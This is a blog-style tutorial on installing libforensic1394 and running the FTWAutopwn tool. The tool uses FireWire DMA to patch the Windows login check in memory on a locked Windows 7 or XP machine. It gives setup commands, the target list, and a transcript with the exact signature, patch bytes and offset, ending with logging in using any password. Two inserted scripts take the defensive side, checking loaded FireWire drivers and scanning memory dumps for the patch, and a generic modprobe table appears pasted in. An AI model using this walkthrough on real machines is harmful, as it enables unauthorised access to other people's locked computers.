
Fire through the wire

25 February 2014

For the last few days I've been working on an alternative to winlockpwn (unlocking locked Windows boxes through FireWire SBP2 DMA) using libforensic1394. Now I've released an alpha version of the tool, Fire Through the Wire Autopwn (FTWAutopwn), on GitHub (https://github.com/carmaa/FTWAutopwn). So here's how to use it:


Check that your distro uses the new IEEE1394 stack (if the machine has no 1394 port, don't bother)

$ ls /dev | grep fw

Aside: `lsmod | grep 1394` shows which of the modules are loaded.

If the new stack is loaded and the system has at least one FireWire port then `fw0` should be printed. Additional ports/devices will take the form `fw<n>`. If no devices are listed then it is likely that the new stack is not loaded.
That sucks; try these commands if you're running Debian/Ubuntu:

$ sudo modprobe -r ohci1394 sbp2 eth1394 dv1394 raw1394 video1394

$ sudo modprobe firewire-ohci

modprobe

Function: handles loadable kernel modules automatically.

Parameters
-a or --all         Load all modules.
-c or --show-conf   Show the configuration of all modules.
-d or --debug       Run in debug mode.
-l or --list        List the available modules.
-r or --remove      Unload the module (automatically, once it is no longer in use).
-t or --type        Specify the module type.
-v or --verbose     Print detailed information while running.
-V or --version     Show version information.
-help               Show help.
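The two checks above (`ls /dev | grep fw` and `lsmod | grep 1394`) tell you which FireWire stack a Linux host is running. The script below is an added example, not code from the original post, FTWAutopwn or libforensic1394: it parses `lsmod` output, reports whether the legacy ieee1394 stack or the newer firewire-* stack is loaded, whether an OHCI controller driver (the thing that creates `fw<n>` and lets bus devices use DMA) is present, and whether an SBP-2 driver is loaded, then turns that into findings a host owner can act on. The two `lsmod` transcripts embedded in it are constructed for the example; the firewire_core, firewire_sbp2 and firewire_net names are the other modules of the new stack and are not mentioned on the page.

```python
"""Report which FireWire kernel stack a Linux host has loaded (added example)."""
import subprocess

# Legacy stack: the modules the post unloads with `modprobe -r`, plus ieee1394 itself.
LEGACY_MODULES = {"ieee1394", "ohci1394", "sbp2", "eth1394", "dv1394", "raw1394", "video1394"}
# New stack: the post loads firewire-ohci; lsmod prints it as firewire_ohci.
# firewire_core / firewire_sbp2 / firewire_net are its siblings (assumption: not on the page).
NEW_MODULES = {"firewire_core", "firewire_ohci", "firewire_sbp2", "firewire_net"}

# Constructed lsmod output: a host running the new stack (what `ls /dev | grep fw` needs).
SAMPLE_LSMOD_NEW = """\
Module                  Size  Used by
firewire_ohci          40960  0
firewire_core          69632  1 firewire_ohci
crc_itu_t              16384  1 firewire_core
"""

# Constructed lsmod output: a host still on the legacy stack with SBP-2 loaded.
SAMPLE_LSMOD_LEGACY = """\
Module                  Size  Used by
sbp2                   24576  0
ohci1394               36864  0
ieee1394              102400  2 sbp2,ohci1394
"""


def parse_lsmod(text):
    """Return the set of module names (first column; the 'Module' header is skipped).
    Dashes are normalised to underscores so 'firewire-ohci' and 'firewire_ohci' match."""
    names = set()
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] == "Module":
            continue
        names.add(parts[0].replace("-", "_"))
    return names


def classify_firewire(modules):
    """Summarise the FireWire state of a host from its loaded module names."""
    legacy = modules & LEGACY_MODULES
    new = modules & NEW_MODULES
    if legacy and new:
        stack = "mixed"
    elif new:
        stack = "new"
    elif legacy:
        stack = "legacy"
    else:
        stack = "none"
    return {
        "stack": stack,
        "legacy": sorted(legacy),
        "new": sorted(new),
        # An OHCI driver is what exposes the bus; without one no fw<n> node appears.
        "ohci_loaded": bool(modules & {"ohci1394", "firewire_ohci"}),
        # SBP-2 is the protocol the post's attack relies on to obtain DMA.
        "sbp2_loaded": bool(modules & {"sbp2", "firewire_sbp2"}),
    }


def advice(report):
    """Plain-language findings derived from a classify_firewire() report."""
    notes = []
    if report["stack"] == "none":
        notes.append("no FireWire driver loaded: no /dev/fw* device will appear")
    if report["stack"] == "legacy":
        notes.append("legacy ieee1394 stack loaded: libforensic1394 needs firewire_ohci instead")
    if report["ohci_loaded"]:
        notes.append("OHCI controller driver loaded: devices on the bus may be granted DMA to this "
                     "host; blacklist the driver on machines that do not need FireWire")
    if report["sbp2_loaded"]:
        notes.append("SBP-2 driver loaded: remove it unless FireWire storage is actually used")
    return notes


def live_report():
    """Classify the host this script runs on (not used by the embedded samples)."""
    out = subprocess.run(["lsmod"], capture_output=True, text=True, check=True).stdout
    return classify_firewire(parse_lsmod(out))


if __name__ == "__main__":
    for label, text in (("new-stack sample", SAMPLE_LSMOD_NEW), ("legacy sample", SAMPLE_LSMOD_LEGACY)):
        report = classify_firewire(parse_lsmod(text))
        print(label, "stack=" + report["stack"], *advice(report), sep="\n  ")
```

Run it as-is to see both constructed samples classified; call `live_report()` to classify the machine it runs on. On the attacking side you want `stack == "new"` with `ohci_loaded`; on any machine you are defending you want `ohci_loaded` and `sbp2_loaded` to be false unless FireWire is actually in use.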


Download and install libforensic1394

sudo apt-get install git cmake python3
wget https://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz

(you can also get libforensic1394-0.2.tar.gz at http://download.csdn.net/source/3573898)

tar xvf libforensic1394-0.2.tar.gz
cd libforensic1394-0.2
mkdir build
cd build
cmake -G "Unix Makefiles" ../
make
sudo make install
cd ../python
sudo python3 setup.py install

(If you don't have cmake, or your cmake version is too old and produces errors, please read this other article: http://blog.csdn.net/wangjiannuaa/article/details/6747042. Also, your default python may not be version 3; you can install it with: apt-get install python3-minimal)


Download and use FTWAutopwn

cd

git clone https://github.com/carmaa/FTWAutopwn.git

cd FTWAutopwn

python3 ftwautopwn.py

Note: git is not required; you can also download it directly from the site: https://github.com/carmaa/FTWAutopwn

If it fails with "cannot open shared object file: No such file or dir...", the problem is the library search path.

Add the lib directory of the installed libforensic1394 to it: export LD_LIBRARY_PATH=/xxx/xxx/lib/xxx (the loader cannot find the directory that actually holds that file).

The last command should now work. Hook up your attacking machine to a locked Windows 7 or XP machine using an IEEE1394 FireWire cable, and run the above command. Select the correct target, and you're off!

$ python3 ftwautopwn.py
Fire Through the Wire Autopwn v.0.0.1
by Carsten Maartmann-Moe <carsten@carmaa.com> 2011

For updates, check out https://github.com/carmaa/FTWAutopwn
[+] Available targets:
[1] Win7 32-bit msv1_0.dll technique
[2] Win7 64-bit msv1_0.dll technique
[3] WinXP SP2 msv1_0.dll technique
[4] WinXP SP3 msv1_0.dll technique
Please select target: 4
[+] You have selected: WinXP SP3 msv1_0.dll technique
    Using signature: 83f8107511b0018b
    Using patch: 83f8109090b0018b
    Using offset: 2146
[+] Searching for signature, 12 MiB so far.
[+] Signature found at 0xd7d862.
[+] Write-back verified; patching successful. Bon voyage!

You should now be able to log onto your target machine with any password.
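The transcript above shows what the tool does in memory: it searches for a signature (the original msv1_0.dll bytes), overwrites it with the patch, and verifies the write-back. Comparing the two hex strings shows the whole change is two bytes, 0x75 0x11 (an x86 jne rel8) turned into 0x90 0x90 (two NOPs). The script below is an added example, not FTWAutopwn's own code, written from the forensic side: given a memory image read from bytes or a file (never from the FireWire bus, and never written back), it reports whether the image contains the original sequence, the NOP-patched one (evidence that such a patch was applied), or neither. It uses only the WinXP SP3 values printed on the page; the sample image it builds is constructed 0xCC filler with the sequence placed at a chosen offset, and the chunked file scanner is my own addition to handle dumps larger than memory.

```python
"""Triage a memory image for the msv1_0.dll bytes shown in the post (added example)."""
import io

TARGETS = {
    # Values from the post's output for target [4]; other targets are not on the page.
    "WinXP SP3 msv1_0.dll": {
        "signature": bytes.fromhex("83f8107511b0018b"),
        "patch": bytes.fromhex("83f8109090b0018b"),
    },
}


def find_all(data, needle):
    """Every offset at which `needle` occurs in `data`, overlaps included."""
    offsets, pos = [], data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + 1)
    return offsets


def diff_bytes(signature, patch):
    """Positions where the patch differs from the signature, as (index, old, new).
    For the XP SP3 pair that is bytes 3 and 4: the conditional jump 0x75 0x11 (jne)
    becomes 0x90 0x90 (NOP NOP), so the jump is never taken."""
    return [(i, a, b) for i, (a, b) in enumerate(zip(signature, patch)) if a != b]


def _state(original, patched):
    return "patched" if patched else ("intact" if original else "absent")


def scan_image(data, targets=TARGETS):
    """Classify an in-memory image per target: 'patched', 'intact' or 'absent'."""
    results = {}
    for name, t in targets.items():
        original = find_all(data, t["signature"])
        patched = find_all(data, t["patch"])
        results[name] = {"state": _state(original, patched),
                         "original_offsets": original, "patched_offsets": patched}
    return results


def scan_stream(fh, chunk=4 * 1024 * 1024, targets=TARGETS):
    """Scan a file-like object in chunks. Consecutive chunks overlap by (longest pattern - 1)
    bytes so a hit straddling a chunk boundary is found exactly once."""
    longest = max(max(len(t["signature"]), len(t["patch"])) for t in targets.values())
    results = {name: {"original_offsets": [], "patched_offsets": []} for name in targets}
    tail, pos = b"", 0            # pos: file offset of the next byte to be read
    while True:
        block = fh.read(chunk)
        if not block:
            break
        data = tail + block
        base = pos - len(tail)    # file offset of data[0]
        for name, t in targets.items():
            for key, pattern in (("original_offsets", t["signature"]), ("patched_offsets", t["patch"])):
                for h in find_all(data, pattern):
                    if h + len(pattern) <= len(tail):
                        continue  # lies entirely in the overlap: already reported last round
                    results[name][key].append(base + h)
        pos += len(block)
        tail = data[-(longest - 1):] if longest > 1 else b""
    for r in results.values():
        r["state"] = _state(r["original_offsets"], r["patched_offsets"])
    return results


def scan_chunked(data, chunk):
    """scan_stream over an in-memory image (used to exercise the boundary handling)."""
    return scan_stream(io.BytesIO(data), chunk=chunk)


def scan_file(path, chunk=4 * 1024 * 1024):
    """Scan a dump on disk; a file is the same kind of input the tool's -f/--file mode takes."""
    with open(path, "rb") as fh:
        return scan_stream(fh, chunk=chunk)


def build_sample_image(state="intact", offset=0x1234, size=0x4000):
    """Constructed image: 0xCC filler with the intact or patched sequence at `offset`."""
    t = TARGETS["WinXP SP3 msv1_0.dll"]
    seq = t["patch"] if state == "patched" else t["signature"]
    assert offset + len(seq) <= size, "sequence must fit inside the image"
    img = bytearray(b"\xcc" * size)
    img[offset:offset + len(seq)] = seq
    return bytes(img)


if __name__ == "__main__":
    for state in ("intact", "patched"):
        print(state, scan_image(build_sample_image(state)))
    print("patch changes:", diff_bytes(**TARGETS["WinXP SP3 msv1_0.dll"]))
```

Run stand-alone it classifies both constructed images and prints the two-byte difference; for a real dump call `scan_file(path)`. A `"patched"` result in a dump taken from a locked workstation is the artefact to look for; an `"intact"` result only confirms the target version of msv1_0.dll is mapped, not that it was attacked.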


Full syntax is provided by using the -h/--help switch:

$ python3 ftwautopwn.py -h
Fire Through the Wire Autopwn v.0.0.1
by Carsten Maartmann-Moe <carsten@carmaa.com> 2011

For updates, check out https://github.com/carmaa/FTWAutopwn
Usage: ftwautopwn [OPTIONS]

   -d --delay=TIME:      Delay attack by TIME seconds. This is useful in order
                         to guarantee that the target machine has successfully
                         installed the SBP2 device before attacking. If the
                         attack fails, try to increase this value.
   -f --file=FILE:       Use a file instead of FireWire bus data as input; for
                         example to facilitate attacks on VMware machines or
                         to ease testing and signature generation efforts
   -h, --help:           Displays this message
   -l, --list:           Lists available target operating systems
   -n, --no-write:       Dry run, do not write back to memory
   -t TARGET, --target=TARGET:
                         Specify target operating system (use --list to list
                         available targets)
   -v/--verbose:         Verbose mode
